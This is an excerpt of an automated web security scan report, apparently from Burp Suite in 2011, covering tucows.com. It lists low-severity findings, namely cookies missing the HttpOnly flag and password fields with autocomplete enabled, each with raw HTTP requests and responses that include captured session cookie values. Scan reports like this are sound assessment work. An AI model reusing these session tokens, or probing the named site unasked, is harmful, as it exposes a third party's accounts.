Date: Thu, 03 Feb 2011 20:50:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...

3.27. http://www.tucows.com/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...

3.28. http://www.tucows.com/preview/194850/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /preview/194850/x22

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /preview/194850/x22 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:25:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 09 Sep 2009 11:33:11 -0400
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 74921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Download SmartDraw
...[SNIP]...

3.29. http://www.tucows.com/privacy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /privacy.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 37121

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...

3.30. http://www.tucows.com/sitemap.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /sitemap.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 284258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...

3.31. http://www.tucows.com/software.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /software.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...

3.32. http://www.tucows.com/terms.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...

4. Password field with autocomplete enabled
There are 62 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


4.1. http://www.tucows.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.2. http://www.tucows.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.3. http://www.tucows.com/about.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /about.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.4. http://www.tucows.com/about.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /about.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.5. http://www.tucows.com/advertise.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.6. http://www.tucows.com/advertise.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.7. http://www.tucows.com/affiliate/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
